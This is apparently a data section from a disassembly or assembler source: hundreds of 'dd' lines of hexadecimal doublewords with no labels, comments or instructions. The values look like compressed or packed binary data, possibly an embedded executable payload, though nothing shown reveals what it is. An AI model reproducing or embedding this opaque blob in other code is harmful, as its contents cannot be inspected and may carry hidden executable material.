dd 70C07F04h, 0CC3880F3h, 0E8F474FCh, 2700A721h, 41EC0390h
dd 6C379624h, 8A994165h, 0E9E5A310h, 0BC7D46EEh, 0D280817h
dd 9187DF5Fh, 7309F5C1h, 0E3CB6AD8h, 2D5900F4h, 20EF098Dh
dd 3B7DC67h, 1571C91Bh, 841684B1h, 3EF711F5h, 0EB273EA5h
dd 0FD9985E1h, 4203BD73h, 14BBEFEAh, 0AD2B6362h, 0EE10CB0h
dd 34EF1B4h, 69E3FDB2h, 6D03FA33h, 1F9DA203h, 9069832Eh
dd 64B9036Eh, 0D6B8B65Dh, 0F745970Bh, 0AC98947Ch, 760D33DDh
dd 0F791281Fh, 0FB1FE947h, 0BAD5F76Bh, 6C20FFCh, 620E1367h
dd 0B9911FE8h, 5D106395h, 0F3BAA19h, 711B1054h, 0C93F2686h
dd 8D0B8CE4h, 955B2417h, 6BC78F58h, 0CF6D0B4Ch, 96DD0DECh
dd 0FD121127h, 0C25F5E5Bh, 0D430000Ch, 6BEBE067h, 7654F875h
dd 0FF81FA9Dh, 52535756h, 0D800E851h, 0FF000004h, 77073096h
dd 0FF0E612Ch, 951BAEEh, 6DC41999h, 0F48F07FFh, 0A535706Ah
dd 0A3E9FF63h, 329E6495h, 0EFFDB88h, 79DCB8A4h, 0FFD5E91Eh
dd 0D2D988E0h, 0B64C2B97h, 7CBD09FFh, 2D077EB1h, 91E7FFB8h
dd 6490BF1Dh, 1DFFB710h, 6AB020F2h, 0FFB97148h, 0BE41DEF3h
dd 0DAD47D84h, 0E4EB1AFFh, 0B5516DDDh, 0C7F4FFD4h, 5683D385h
dd 13FF6C98h, 646BA8C0h, 0FF62F97Ah, 65C9ECFDh, 15C4F8Ah
dd 6CD914FFh, 3D636306h, 0F5FAFF0Fh, 0C88D080Dh, 3BFF6E20h
dd 4C69105Eh, 0FF6041E4h, 677172D5h, 3E4D1A2h, 0D4473CFFh
dd 85FD4B04h, 6BD2FF0Dh, 0FAA50AB5h, 35FFB5A8h, 42B2986Ch
dd 0FFBBC9D6h, 0BCF940DBh, 0D86CE3ACh, 5C7532FFh, 0DCF45DFh
dd 59DCFFD6h, 0ACABD13Dh, 26FFD930h, 51DE003Ah, 0FFD75180h
dd 0D06116C8h, 0B4F4B5BFh, 0C42321FFh, 959956B3h, 0FCFFFBAh
dd 9EB8BDA5h, 28FF02B8h, 5F058808h, 0FF0CD9B2h, 0BE924C6h
dd 6F7C87B1h, 4C112FFFh, 1DAB5868h, 3DC1FF61h, 90B6662Dh
dd 76FFDC41h, 1DB7106h, 0FFD220BCh, 0D5102A98h, 0B18589EFh
dd 0B51F71FFh, 0E4A506B6h, 339FFFBFh, 0A2E8B8D4h, 78FF07C9h
dd 0F00F934h, 0FF09A88Eh, 0E981896h, 6A0DBBE1h, 3D2D7FFFh
dd 6C97086Dh, 7B91A564h, 0F4E663FFh, 626B6B51h, 1C6CFF61h
dd 856530D8h, 62FF004Eh, 695EDF2h, 0C6A57B6Ch, 0FF8D1B01h
dd 0C4578208h, 0FFC6F50Fh, 5065B0D9h, 0EA12B7E9h, 0BFBEB8C1h
dd 0FCB988DBh, 0DDFF1DDFh, 0DA2D4962h, 0FF7CF315h, 4C658CD3h
dd 6158FBD4h, 0CE4DB2E1h, 743A7F2Ch, 0E2A3BC00h, 0D4BB30FFh
dd 4ADFA541h, 0D895DBD7h, 0D1FFC461h, 0D6F4FBA4h, 0FFE96AD3h
dd 0D9FC4369h, 8846346Eh, 0D0AD67FFh, 73DA60B8h, 4404FF2Dh
dd 33031DE5h, 0AFF4C5Fh, 0D7CC9AAh, 0FF713CDDh, 41AA5005h
dd 10102702h, 86BE0BFFh, 25C90C20h, 5768FFB5h, 206F85B3h
dd 66FFD409h, 61E49FB9h, 0FFF90ECEh, 0C9985EDEh, 982229D9h
dd 0B4B0D0FFh, 17C7D7A8h, 59B3FF3Dh, 2EB40D81h, 0BDFF5C3Bh
dd 0BA6CADB7h, 0FF8320C0h, 0B3B6EDB8h, 0E20C9ABFh, 9A03B6FFh
dd 3974B1D2h, 0EAD5FF47h, 9DD277AFh, 0DBFF2615h, 0DC168304h
dd 0FF0B1273h, 3B84E363h, 6A3E9464h, 0A80D6DFFh, 0B7A6A5Ah
dd 0E40EFFCFh, 9309FF9Dh, 0FFAE27h, 79EB10Ah, 0FF93447Dh
dd 0A3D2F00Fh, 0F2688708h, 0FE1E01FFh, 5D6906C2h, 0F762FF57h
dd 806567CBh, 6CFF3671h, 6B06E719h, 0FF1B766Eh, 2BE0FED4h
dd 7A5A89D3h, 0CC10DAFFh, 6F67DD4Ah, 0F9B9FFDFh, 8EBEEFF9h
dd 0B7FABE43h, 0B08ED517h, 0D6A342DFh, 93FF7ED6h, 0C2C4A1D1h
dd 0FF5238D8h, 0F14FDFF2h, 67D1BB67h, 0A6BC57FFh, 3FB506DDh
dd 0B236FF4Bh, 0D2BDA48h, 1BF84CD8h, 4AF6AF0Ah, 7A608B37h
dd 0C34104FFh, 55DF60EFh, 0A867FFDFh, 316E8EEFh, 69FFBE79h
dd 61B38C46h, 0FF831ACBh, 0D2A0BC66h, 0E236256Fh, 955268FFh
dd 3CC0C77h, 0BB0BFF47h, 220216B9h, 5FF262Fh, 0BA3BBE55h
dd 0FF0B28C5h, 5A92B2BDh, 6A042BB4h, 0A75CB3FFh, 31C2D7FFh
dd 0B5D0FFCFh, 2CD99E8Bh, 0DEFFAE1Dh, 64C2B05Bh, 0F8F2269Bh
dd 0A39CEC63h, 93ABB76Ah, 0A902FF6Dh, 3F9C0906h, 0EBFF0E36h
dd 72076785h, 0FF005713h, 0BF4A8205h, 0B87A1495h, 2BAEE2FFh
dd 1B387BB1h, 9B0CFFB6h, 0D92D28Eh, 0E5FFD5BEh, 7CDCEFB7h
dd 0FFDBDF21h, 0D3D2D40Bh, 0D4E24286h, 0B3F8F1FFh, 836E68DDh
dd 0CD1FFFDAh, 5B81BE16h, 0F6FFB926h, 6FB077E1h, 0E3B74777h
dd 7D5AE618h, 0F6A707Fh, 0FF3BCAFFh, 0B5C6606h, 9EFF1101h
dd 0FE69D95Bh, 0D3F862AEh, 37616BFFh, 0FF166CC4h, 0A00AE278h
dd 0D70DD2EEh, 48354FFh, 3B3C24Eh, 2661FF39h, 16F7A767h
dd 4DFFD060h, 0DB496947h, 0FF3E6E77h, 0AED16A4Ah, 0D9D65ADCh
dd 0DF0B66FFh, 0D83BF040h, 0AE53FF37h, 9EC5A9BCh, 7FEBDEBBh
dd 7F4CB2CFh, 1C30B5FFh, 0BDFFBDF2h, 0CABAC28Ah, 0FFB39330h
dd 0B4A3A653h, 0D0360524h, 693BAFFh, 5729CDD7h, 0BF54FFDEh
dd 2E23D967h, 0B3FF667Ah, 0C4614AB8h, 0FF681B02h, 6F2B945Dh
dd 0BBE372Ah, 8EA1B4FFh, 0DF1BC30Ch, 8D5AFA05h, 372D02EFh
dd 0FE83C802h, 3980FFC8h, 0D0F7400h, 32D0FFF2h, 8E8C111h
dd 97C50433h, 0EC9ABF41h, 5F5B5A59h, 63C35ED6h, 1618530h
dd 0F0C1F5h, 35A1B7F4h, 5E74CF26h, 0B7730CC7h, 0AC14A86Eh
dd 3C98C33Bh, 1D5B2B32h, 9E2D7093h, 0E30CFFFEh, 20FB0F76h
dd 14270731h, 4CA6BD7h, 5F77E07Bh, 0EC811913h, 486C0A5Ah
dd 30D4FB1Eh, 0F0C44421h, 413DD32Eh, 825283B6h, 0D7F00374h
dd 0E7215A2Dh, 0C0C85C1Dh, 1F8F6D0Dh, 9A34BD9Bh, 4BC3429h
dd 988E7C4h, 2620812Ah, 0DE52CF43h, 26A6B77Ch, 0E1161A6Bh
dd 0F2B214B1h, 0B1B86F1Eh, 8C9E687Dh, 0DF09790Eh, 0EA2223E8h
dd 1A1DF843h, 9E7158Ch, 22173078h, 7DD0D093h, 9AF764C6h
dd 0D4412403h, 1E1E0496h, 0EA0EC686h, 0E010940Ch, 590BEC02h
dd 0E2A37F7h, 50B1B828h, 6662B31Ch, 3DA86BDDh, 8B176FA5h
dd 5A160BD4h, 19BABC58h, 0A53ED900h, 4D09A836h, 0F798090Ah
dd 0B45123EDh, 359F28C4h, 12053785h, 780E5BDEh, 45A9EFE6h
dd 555A0FADh, 84831BDDh, 6AA7C50h, 0E703883Fh, 7BD7A3FEh
dd 4586EE3Eh, 6E2408EBh, 6C3D31ECh, 389B6436h, 0C512609h
dd 977F1083h, 0B2E6C703h, 51DF83AFh, 6F4209ECh, 836389E6h
dd 2F12690Eh, 0D409F66Fh, 7181036Ah, 6C192A8Ch, 48375B3Ch
dd 0E9018ABh, 3ECB5C1Bh, 26608F70h, 0F5EF8548h, 0CBD803F6h
dd 0C33018C9h, 0A7B2019Fh, 6BD712DEh, 2215B40h, 3CD542D9h
dd 6CDBCFC4h, 0C20B9AAAh, 60DD7468h, 309DD43h, 0E4321CCEh
dd 0F1353DA1h, 31B0ED6h, 0FB5B31E2h, 9D0C1997h, 0DA95642h
dd 6D67A806h, 0BB0A306Bh, 148B0B03h, 0EC10EFADh, 9551C58Ah
dd 9DF6C13Dh, 52F8B2DCh, 0B04B036Ah, 99C0963h, 97E3632h
dd 0C29FED4Dh, 64D993C1h, 0E78FD8D5h, 0AD6C0D6Ch, 9B9C1A9Dh
dd 6F6BF48Eh, 0EFFC0704h, 27501763h, 1B67BA59h, 2D16DEC2h
dd 0A2CC87D7h, 4D69EB3Fh, 5D5E52B8h, 1B4A9350h, 8CE75867h
dd 21C08B6Fh, 610FEE09h, 3611B703h, 0FB8BC07Eh, 458E3A25h
dd 7DD2F78Eh, 0EE646CE3h, 70E06C2Fh, 0D21D9F6h, 233D0436h
dd 3258F73Dh, 1A567B7Eh
dd 751B52AAh, 0E925C198h, 0D2C77D86h, 3ED50033h, 30A18A80h
dd 1B432B15h, 0E69B467Bh, 80917504h, 60F74D27h, 128DDBE2h
dd 72D8617h, 724A0FC3h, 5A66A5C6h, 1B63FBBBh, 27C60E63h
dd 0BFF7856Bh, 0DE6F03F0h, 308DDBF9h, 0D98330B3h, 60583B03h
dd 632EF1CFh, 0EE67E92Bh, 0F9D0DBBh, 0F1C119E1h, 6BF43B99h
dd 0DC6AA06h, 6C9B12D6h, 32FA58C5h, 43C1D7AEh, 2EBBDABCh
dd 5A802EEh, 0E12BAA8h, 0BBD08421h, 1C0E070Fh, 0E658263Eh
dd 4E764208h, 93844D4Ch, 83675209h, 3ED6B264h, 18935AF0h
dd 80C3712h, 6DA35BA7h, 80422F41h, 0BDFF7AC5h, 0FF1E854Ah
dd 8700E34Fh, 80BE0878h, 0ECB0F589h, 29769CD6h, 83157BC6h
dd 6151A97Dh, 0CE4CEA2Dh, 0E7C1A28Bh, 67681FBDh, 8B6714B7h
dd 0DBEB4781h, 0ACA0036Dh, 6D187966h, 0A3C3B96Dh, 27B569F6h
dd 0A9602634h, 0FA720EDEh, 0C9F07820h, 4610CC36h, 207A2017h
dd 6B08BBB5h, 51EFF925h, 0CC7C6732h, 0BED83260h, 7D06D20Dh
dd 967E497Ch, 196B4402h, 0C65FFBBh, 0C966181Bh, 715484F9h
dd 0A4DA06F8h, 197692E8h, 0B7DDE3ADh, 3D4EA93Bh, 8C493583h
dd 0F49B4D84h, 75B03D17h, 5BE803B9h, 9DA3C277h, 4DDFDAC6h
dd 98F3824Ch, 3D9E5B93h, 8A86086Eh, 0C3B21AC9h, 43346043h
dd 0BE52BECCh, 0FCDAFA3Ah, 196B54C2h, 0C6E50EB9h, 54CF800Eh
dd 0D63DA69h, 26DA6787h, 12E7D8DBh, 4B9782F6h, 0D303F6E9h
dd 0F704AC50h, 5AC75ECEh, 0DC74ABC3h, 0B0DF8901h, 67DBDh
dd 0A5DD4E58h, 216F410Eh, 6F436514h, 6FE84D04h, 0F67C7C7Dh
dd 0F60E5765h, 49872FBCh, 1B937030h, 4C025826h, 4ECD0662h
dd 0AB9B726Fh, 166347F0h, 3C82497Ah, 161F7331h, 7002135h
dd 1DDEB84h, 19500665h, 0DB036F74h, 24162565h, 0A2C10A60h
dd 0F0EB92F0h, 48DB0F3Bh, 0A1036B65h, 651DAC0Dh, 0FD309298h
dd 0D760BD43h, 5816A321h, 5D3638D4h, 0A40F1753h, 2D16D9BDh
dd 3B7B0FD2h, 70034E0Ah, 0AE4B69C1h, 92C2B1B2h, 0FA30DA84h
dd 0BA7EFE24h, 8DEF6F3h, 0CF25FB00h, 6FF8EA39h, 6A9FB50Ch
dd 51A3046Fh, 0C7296326h, 0F0304318h, 413EC518h, 400F4C1h
dd 0ED659758h, 0FC2DA79Ah, 8BF17BD2h, 0E77D0075h, 53FA8FFDh
dd 0FB087A95h, 3D6624Dh, 491C41D0h, 306C6038h, 0FF1DDD35h
dd 4EEB5C2h, 1B2780Bh, 0EC93A88h, 1B5D8902h, 107809EBh
dd 609B7893h, 0DF9D854h, 0DB80F8CFh, 3B10CC3Eh, 0FF143CBAh
dd 0DE1B7C3Eh, 9F4B6253h, 2CF3A1C6h, 2AFD6CF7h, 0C309360h
dd 7B300996h, 37FBD386h, 6E181241h, 0A0989804h, 37801A13h
dd 0C22021E7h, 61F8C475h, 910000BDh, 1EE5E18Eh, 0B138857Ah
dd 7ACCB9Bh, 3E9106Ch, 0F74835BDh, 5B191FACh, 97C60336h
dd 10BEB28Dh, 0EA827D80h, 0F3CE17B6h, 0E011C14Bh, 0B2F3C15Dh
dd 11DDD080h, 0DF09E8C6h, 72656B0Dh, 6CEC656Eh, 0E01B3233h
dd 0F0F49089h, 0E383E459h, 0B82101Bh, 0D6C15F25h, 2C3B625Bh
dd 0EF1516E2h, 0B3AD5CB8h, 0AEDD2928h, 20D2DBEh, 870A7583h
dd 2416C8B0h, 60DFF5Ch, 17037614h, 0B620E84Fh, 1C189A24h
dd 19822C49h, 52F2C74Dh, 37507BBBh, 0C1C90E26h, 0D87513C5h
dd 0FE4A062h, 32F8184Bh, 0CE09D8DEh, 7C9B8D11h, 0B3426546h
dd 5F600F1Ch, 2E99C8Dh, 0E1F60F37h, 426E794h, 5E8B39C9h
dd 21692F63h, 3FE1EF6Fh, 77086EB5h, 6C5F21CDh, 43982C49h
dd 0F28BD149h, 74B309ACh, 87FFFF0Dh, 23C5815Dh, 0B4670012h
dd 7B4F78C8h, 1A0E1EA7h, 0B2BCF6Fh, 13EBBE3Fh, 0F672C0DAh
dd 0C403B91Ch, 0E38E63A5h, 0D9D98E64h, 0FD453609h, 7996710Dh
dd 0BA3B4984h, 153D0D86h, 8D5DBBE7h, 33BEB034h, 97BD89CDh
dd 3D1D400Dh, 9051D1ABh, 94C3DD8h, 39C2AC2Ch, 58031777h
dd 0B1D63DC4h, 787F17EEh, 741D7B4Ch, 5F1AA121h, 0DD87EC06h
dd 2500F3DFh, 2C9240C5h, 5837619Dh, 0BA6F6E78h, 4BC2397h
dd 0C41D5853h, 8C9366D4h, 40D0E8B0h, 9D03DBB6h, 0DECF31A3h
dd 0E1D12EFEh, 3B9B563Bh, 6F04492Ch, 58A8844Ah, 0E12669Bh
dd 0EAAF5D1Eh, 6A6E03BFh, 800D6E9h, 83A3305Fh, 8248F516h
dd 0DA47CE2Ah, 0A2319E10h, 9D831690h, 0F486C9C1h, 0CEF78CFCh
dd 24597D76h, 2448CB31h, 0B6EBFB31h, 81BC71A7h, 6477E99Fh
dd 8964FF91h, 14AE921h, 64180000h, 371DED62h, 617719EEh
dd 1793EE24h, 11C5168Ah, 78E76C83h, 19FA1DD9h, 28CCD2F7h
dd 6E53300Ah, 0CCB7183Eh, 84713447h, 67C4FA4Ah, 16750566h
dd 85E00605h, 3C75A426h, 0D4D37775h, 24BE52AFh, 472DA603h
dd 96E1E510h, 0ACCC2622h, 1DD30635h, 0E81F0617h, 0F04B185Ch
dd 732C0D5Dh, 729EE51Eh, 0A2B1212Fh, 5442831Ch, 2BF86309h
dd 0E3E9C9C5h, 96EC3869h, 0C9613B68h, 0F7C3A506h, 52DCD65Fh
dd 0DF6B2D1Fh, 0E90D0B5Eh, 0D241A67h, 0B4B7C88Ch, 0B16D1115h
dd 0B4AC3974h, 0CA9D153Ah, 0B6138C30h, 31FF64FFh, 0FE8B4DE9h
dd 0AB0FF1D1h, 63F72166h, 127FDBBAh, 8E80A19Eh, 0A9FC45DBh
dd 0AC231B07h, 0B3966546h, 0AB61D40Ch, 9BB68EBAh, 647C0FC7h
dd 0DD84D21Ah, 0D8D460Dh, 0C5EA861Fh, 0A31D5DADh, 1825E4D8h
dd 7D806DD2h, 673062E7h, 7ABE563Eh, 0CEAE2FBh, 6E1F419Dh
dd 0C6577203h, 962BB72Ah, 0D66B4B31h, 0D43D8602h, 188DD1D6h
dd 481F1647h, 0B1EFDC33h, 0EC390C96h, 8EDB85F3h, 0FF6C036Bh
dd 0F358D2BEh, 0F2E9D32Bh, 5247C083h, 82BEF433h, 0D2E57723h
dd 0CAFF80F3h, 0F9388B56h, 0FF910172h, 81F2D70Bh, 64CA86C7h
dd 0E3831BFFh, 93EF8119h, 0BB64C26Dh, 2C1BDBADh, 0F346FFC7h
dd 0FD76F381h, 1D6FE85Ch, 0DBCFD7EFh, 3F3AAE85h, 0DC57F3C3h
dd 885AE87Fh, 0F2DF2B10h, 420340DBh, 0E5136F4Eh, 0F3ECDB33h
dd 0FDABF33Bh, 0A975DA96h, 0A952099Fh, 0A089F6FFh, 0FF03CFADh
dd 905F812Eh, 0EEA1899Eh, 0F57F012h, 0A1186EFDh, 0B9DE9F19h
dd 0EDBE6B08h, 3FFD164Fh, 8E5F62B3h, 1D10EE9Eh, 0E70F20B7h
dd 4F5B7A6h, 3DFE179Bh, 869E915Fh, 0DD9E9Fh, 560B2BD9h
dd 0DC0963A2h, 0A77B1B3Bh, 0DD2D6044h, 96EC8653h, 3B399EA1h
dd 0D07B1896h, 1F278CD5h, 0C2E22DFAh, 0A1149AFDh, 0D6319F15h
dd 3312B417h, 850DBB62h, 17A1F716h, 58089F9Fh, 6ACF168Ah
dd 9E93FF5Fh, 0E9E925Fh, 9FDD0FA1h, 6F6A18DCh, 0E80FD247h
dd 67FC1D63h, 0A3BBDC34h, 6F29A316h, 0A112AA0Bh, 349F13FBh
dd 3B97925Fh, 430652FFh, 0CF7D80C3h, 0A708D67Ah, 0FC1DF741h
dd 87D90DA9h, 88C2ED1Ah, 5266DB03h, 0BD8AF15h, 52DE3912h
dd 5FBEEDC7h, 0ADBCDB94h, 541913CEh, 9DEECBFBh, 70C97600h
dd 5E413610h, 0EB88930Dh, 3AA50B57h, 1BC6780Dh, 0ABB74190h
dd 603B4003h, 392DB7Eh, 2795B9D5h, 0F71B06BBh, 0DF691924h
dd 5FC399D5h, 0C2767D8Fh, 21291F5Ah, 2F027116h, 64F662Fh
dd 25D8B17Ch, 6E8BDEB1h, 0FB955FD2h, 1B133B5Eh, 1D3D5E02h
dd 7D2CBD58h, 128C4148h, 0B67A27C6h, 0E285CD8h, 42F68DC9h
dd 0F7047BB7h, 5829A696h, 9860C5B3h, 0CF0DD7D8h, 0A1F61A2Bh
dd 0EBD9F1Bh, 801D4E32h, 0DC0121CDh, 0EB138423h, 191C4909h
dd 381CE1A4h, 121D9F76h, 161E3CEEh, 9A5948B7h, 1B9AB1A5h
dd 98C1C9Dh, 0B2AF20E4h, 88726F70h, 11A110E1h, 754F778h
dd 1A1A5936h, 2DA32236h, 0DE4B111h, 7519BD93h, 61F87FEh
dd 0EF3CDFA6h, 8241A17Dh, 0B1E63C3h, 0EEA1B863h, 31CE0085h
dd 0F403E9B7h, 0F8EB0E18h
dd 0A5443BA8h, 0F510623Eh, 0C4552AC6h, 572E3E83h, 0A18AFF74h
dd 636F7472h, 0A664E518h, 7D1EB3C2h, 8DAA344Fh, 0D7F61639h
dd 5FF00F25h, 69E3675Ah, 0F71006D7h, 8FD88D2Eh, 3345DE0Eh
dd 3476AE1Ch, 3EB6BADh, 0E01B16AEh, 93A131B7h, 614F3DBCh
dd 88601EDBh, 0DE83690h, 0AC7793D1h, 0A13F7E08h, 0A6DE1Fh
dd 269E9EC2h, 0CD414558h, 43EE407Bh, 0D988E282h, 361A2E00h
dd 244C3D26h, 72DD3061h, 256F8D42h, 6569A214h, 0E012B617h
dd 0E88893Bh, 49A71163h, 9E0F3692h, 43345D7Ah, 0A1147D91h
dd 853030F4h, 756143FBh, 3D30831h, 73114D55h, 0C6B5782Eh
dd 0F8105E2Ah, 2DD9AC61h, 0B71083EDh, 2E603FFDh, 4B0485B7h
dd 1A24B113h, 58FA42B2h, 0D3A5BB09h, 9F5D6223h, 0BA969D2Fh
dd 0DC01327Fh, 5BBCEA03h, 365FCF21h, 4E0478AAh, 62CF35EAh
dd 0D630799h, 0C63D6775h, 1F3667CEh, 0C65F18ECh, 5B139E8Fh
dd 219C3B7Dh, 0C1C1ED7Bh, 4F8A1815h, 63F3F851h, 0AF600E0Dh
dd 0B7271AD8h, 0B1270240h, 60B317BFh, 3BB3F8F2h, 4B8F5FBCh
dd 2B9A4CAh, 81300C16h, 4F63F083h, 1263C202h, 0BFD048DFh
dd 6159AD30h, 3678C826h, 8320D75h, 3B8830Dh, 8C432165h
dd 8F1EC9F6h, 0CC321DA3h, 21BF8A7Bh, 3E74AFA3h, 0C6301626h
dd 5AF4001Ah, 7D1517E1h, 0DF6091A1h, 0F6A036F4h, 301DDCCFh
dd 0A9AB9363h, 68365709h, 79187BDAh, 1AC17703h, 0EC11832Fh
dd 8F319693h, 6EA0846h, 0DCE010F6h, 79E1175Eh, 913B2796h
dd 0F30A7203h, 236339ECh, 984BC06Ch, 0B8654ED9h, 46FDE05h
dd 1E340D8Bh, 0B76D07A8h, 8100DE1h, 1B425B8Ch, 0DE780C51h
dd 817B96ABh, 7CAC0DB0h, 86463B68h, 8C5F13Fh, 5306FBF4h
dd 1B94CF90h, 6C181EACh, 779B5D48h, 0C2E0C309h, 43B3BFCh
dd 0C47B4950h, 0A9283310h, 3DC8AD3h, 9661153Ch, 0C4166C2h
dd 0D5BC734Ah, 49202EBh, 1920543Bh, 0C06CDDABh, 0D04AA8EEh
dd 915ABE14h, 67B0B3F0h, 0A9B1A13Ah, 956EAC0Dh, 3B740336h
dd 4FD730C0h, 7E3ADB85h, 39F4D8D9h, 0A312D923h, 0BE2D9B37h
dd 0D32464Ah, 3912046Ch, 164D6BBCh, 8080CBFh, 0EC2506E1h
dd 0C5486241h, 46711576h, 0EDF023F6h, 0CB44F004h, 0D9B661E5h
dd 6A304E34h, 0C287FA20h, 0B34371BEh, 0B6FA31DDh, 9EC91A8Dh
dd 0B3CA6497h, 3B6B0EAFh, 5840AD29h, 6811B92h, 0E5EAC769h
dd 382DF606h, 0F168EC17h, 986050AAh, 0C2BBCF71h, 971C819Ch
dd 0A6896F82h, 0E2C39976h, 0A7368871h, 0B8943D53h, 0B1EF790Bh
dd 658C29C4h, 1F8E1BFDh, 0E1DF68DFh, 129E925Fh, 0ED66080Ch
dd 0EF2D4538h, 0A68F1970h, 0B50DF7B7h, 1C087C0Ch, 20B8E918h
dd 75C3802Ah, 0E27230B3h, 7BC2FDF8h, 0C6044EFAh, 74A0F129h
dd 0FFC39E69h, 85BCCE99h, 4B6CBA10h, 4BB0600Dh, 0FC3D673Ah
dd 386C60DFh, 70EA0217h, 0AD9E9731h, 2C79F889h, 0E351F23Dh
dd 8EAC1179h, 0C5DDEC7Ch, 3BC7E01Ah, 2BB114CFh, 0B2AF8C15h
dd 772943F8h, 0CBA163BDh, 25EBEE64h, 9E1D68B1h, 5EF4F45Bh
dd 2761BDF6h, 0D2BFDCF1h, 78BD6236h, 0FAFD5FFBh, 5FE07917h
dd 4FB8473Eh, 64438B22h, 90B498C4h, 97A9E949h, 0B6A6832Dh
dd 0C2767958h, 0FB0B7DD0h, 640E8DD4h, 709D32FBh, 11177721h
dd 0FC883E4Eh, 8E61C212h, 9DF33D13h, 60904383h, 0EE4A78FCh
dd 7BFF8FF8h, 624E2D99h, 44E5694h, 6F1C28E9h, 0C6B9ADAEh
dd 58BB88D1h, 1EEEA4B1h, 0B1196AD6h, 1E8C3FB2h, 77A6435Eh
dd 5969A4A1h, 5DF6AD6Ch, 7810051Bh, 7B193C5Dh, 18273265h
dd 0AF9141F4h, 3DF059C5h, 619E905Fh, 7BA2BDCh, 1164E3FBh
dd 4DB3BFC2h, 0A58F63FCh, 2BFA27F1h, 131C919Ah, 25C5F586h
dd 43909E9Eh, 906E717h, 99160A50h, 9D29362Fh, 0DF209732h
dd 0AA0C9F32h, 16776FFBh, 4F41951Ah, 76CA8084h, 30145FADh
dd 0FA69933Fh, 0AA24B866h, 2AC451Eh, 0BBAF0BD8h, 60F114D2h
dd 0B774876Dh, 8A6A030Fh, 8E87F777h, 7A9EB3A1h, 66E29E93h
dd 48ED4DE6h, 23D5A156h, 0B1C685FFh, 7A4DB009h, 0ED24166Dh
dd 8820995h, 476031CBh, 11C56BDDh, 0C22D64DFh, 953B5A03h
dd 0BE09309Eh, 0DE8CC617h, 991B772Ch, 6D4C0DDFh, 0DEF854ADh
dd 0A00987A0h, 0C1A129C6h, 1DDEB797h, 84C567Ch, 3BB4DB5h
dd 0AB079309h, 0F10E40D0h, 746C8A10h, 0A96F6C0Dh, 15805FFBh
dd 30A31A0Eh, 0F3C8ECE5h, 0DFFAF09Eh, 0CFF71AC6h, 493B487Ch
dd 76BF6111h, 0F60A4757h, 0F6A22187h, 98492E0Ch, 4CE4A736h
dd 84402106h, 8253BF5h, 618E9370h, 9BC0C623h, 42A9031Bh
dd 75BD2D74h, 265DEB4Dh, 3F2C1B3h, 0E55674F1h, 0D3449FB3h
dd 0F49138Ch, 0DC161B6Eh, 750D1D76h, 0D6FE775Eh, 46F0053h
dd 63FDDF9Ch, 8A64A617h, 9E09A0DEh, 34EB3FFBh, 441B122Ah
dd 0BE15065Eh, 349D0B75h, 53831B3Eh, 7B8472A6h, 30FAC67Fh
dd 0DC410C91h, 0D94669EDh, 0AE06A01Eh, 1B338949h, 0A5B25C0Eh
dd 0CBC6ADE0h, 8B08DA71h, 0C6ED3F3Eh, 31C93B27h, 6C0900B2h
dd 0F1F0EFD6h, 0A1CABD41h, 0E18AB96Ch, 0B6D8D870h, 0CC9110ADh
dd 1EC8166Fh, 0BFB9094Eh, 0FDD70234h, 22ADBEE7h, 37389DA4h
dd 502085B4h, 4B2EA2E8h, 0F023090Eh, 87BB6C9Dh, 97563h
dd 56213234h, 0D40E3AD8h, 44868739h, 0EAB02F49h, 0ED2ABF58h
dd 0BD95F49Fh, 1ACD6748h, 18C00CD0h, 0F7F484DBh, 0EC7C9CAEh
dd 6C131F90h, 0F5FBBF80h, 0A126C910h, 8C2D5428h, 97939C09h
dd 0CAD88464h, 658FCD66h, 3DFAB976h, 5F6CEA32h, 0B22B9A2Ch
dd 0C7D1D9DFh, 0BD6C8E76h, 1EEB9850h, 2FFCBF05h, 0AC875EA8h
dd 65869BB4h, 2FF1476h, 87CEDF29h, 81609AAEh, 304F49D8h
dd 0C34DF106h, 0D7AC4F64h, 0DC41CAC3h, 67840223h, 84B2E355h
dd 917161F3h, 0AEA40C0Eh, 131D2D0Fh, 82BF60D9h, 55A602FBh
dd 0EE0DD5ADh, 5195F9C9h, 74DCFB0Ch, 7F609E31h, 78BAD6D2h
dd 84131ED4h, 64FBD3B2h, 27ADBD08h, 64D06A93h, 2F41C21Fh
dd 9EBC94Dh, 267FEC4Ch, 7026E899h, 0A32A46CFh, 5097C801h
dd 0B3DAD6Fh, 967D87C1h, 0BA09C602h, 1220877Ch, 288D235Fh
dd 1C972727h, 18FDB406h, 0B938E947h, 860CEF31h, 0ED4C4E80h
dd 0D1743A08h, 65DF4E21h, 0EE641604h, 7C440CC2h, 2550D485h
dd 1E4A8B24h, 0C96FEBB9h, 0DDA96224h, 93A0860Dh, 2B3FB511h
dd 5BC1AC23h, 414A8D9Eh, 9ED8148Dh, 0F9EB3726h, 9218A412h
dd 773B3990h, 33B626FAh, 553DED6Dh, 36E00440h, 0B4B2139Dh
dd 226BF5Eh, 0DD6972E8h, 8011194Bh, 3C7EB403h, 3F02D5ADh
dd 0A1E23302h, 870A6FEEh, 6E42E308h, 0D1061F45h, 788DD506h
dd 0F5175C91h, 48145656h, 0B8285660h, 914EC6E8h, 0C75CEC56h
dd 6B613EEEh, 48BA2FC5h, 48501163h, 0A53308BEh, 0DE91A84h
dd 25FE118Dh, 0E0DF65Bh, 21361270h, 696D18CFh, 2993709Dh
dd 0C39E60ECh, 88D89886h, 0C0A8C912h, 8C9D751Eh, 0CE4703B9h
dd 48BC9671h, 0B1A18C6Dh, 64BB7993h, 27AEC509h, 0D3B1779Ah
dd 83C8B30Eh, 1B0DAE6Bh, 63DF1C37h, 917A7A1Bh, 6D40199Eh
dd 7099EC34h, 12989248h, 0D3F66184h, 72E01287h, 314CBD3h
dd 8AC08740h, 55AEC62Fh, 0FEB03EBh, 0EE2BC7EDh, 0D6B3B8Ah
dd 8DDF98Ah, 6819E139h, 0A2128BFEh, 10998621h, 277FA2B0h
dd 9EA72D23h, 5591049Eh, 0C22D2E16h, 7C33CA04h, 1CBD04E6h
dd 0A41DB3F6h, 3374C38h, 42617D5Fh, 93758E60h, 93636D9Dh
dd 9867726Ah, 4982B37Fh
dd 5E7B4AEEh, 1A1BB137h, 6C2476B2h, 0FD3CABh, 5E2D02C7h
dd 0A1FAFFBEh, 6E3326E9h, 85557804h, 78A0EE44h, 0BA8132CDh
dd 370F2CC9h, 5BCB12A3h, 774D861Ch, 91BE6AC5h, 8E79E6Ah
dd 9EC6F724h, 0FED0A5Fh, 0D8E80867h, 0C21B8B3Dh, 0F61D335Ah
dd 30027394h, 0FEFEA894h, 0A0815F90h, 0A18803DCh, 48232B1Ah
